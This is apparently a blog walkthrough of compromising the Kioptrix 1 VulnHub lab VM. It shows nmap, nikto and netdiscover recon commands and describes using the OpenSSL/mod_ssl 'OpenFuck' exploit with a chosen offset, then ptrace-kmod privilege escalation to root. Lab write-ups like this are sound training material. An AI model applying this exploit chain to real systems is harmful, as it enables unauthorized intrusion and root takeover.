Kioptrix 1 Walkthrough

Kioptrix 1 VulnHub VM Walkthrough

I started with box with a netdiscover scan, found the IP was

netdiscover -r

Then ran an nmap scan and discovered some open ports

nmap -sV -Pn -vv -T4 -A -p- –script=auth,brute,discovery,exploit,vuln -oN

SSH version

Apache version, some OS info and mod_ssl/openssl version

An open rcp port

NetBIOS and https

I continued my enumeration by running dirb against the webserver


I found a site, the Multi-Router Traffic Grapher. I looked up associated vulnerabilities, but didn’t find much 🙁

A Nikto scan picked up a few Apache and OpenSSL vulnerabilities

nikto -h

I searched for possible exploits in google and found a couple

I tried the second entry, openssl-scanner. The host came back as vulnerable!

This is a great tool if you have to scan an entire network quickly for this openssl exploit
I could use openssl-too-open and escalate privileges manually, but OpenFuck should do this for us 🙂

We execute openfuck with no options to find our OS/apache version

We have to use 0x6b for the exploit to work, and chose 40 connection because the exploit doesn’t always take right away. After we connected to a shell, openfuck downloads, compiles and executes ptrace-kmod to attempt privilege escalation to root. In our case it worked!

After getting root, I looked around the box for anything interesting… I noticed some files in /var/mail/ for a couple users on the box

After cding to the dir, I found a file named”root” which congratulated me for rooting the Vulnerable VM!

Leave a Reply

Your email address will not be published.